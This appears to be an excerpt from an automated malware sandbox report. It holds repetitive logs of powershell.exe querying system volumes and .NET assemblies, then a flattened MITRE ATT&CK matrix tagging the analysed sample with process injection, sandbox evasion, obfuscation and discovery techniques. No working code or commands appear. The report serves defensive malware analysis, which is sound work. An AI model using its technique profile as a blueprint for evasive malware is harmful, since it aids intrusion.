Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1Path InterceptionProcess Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting211LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery12Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
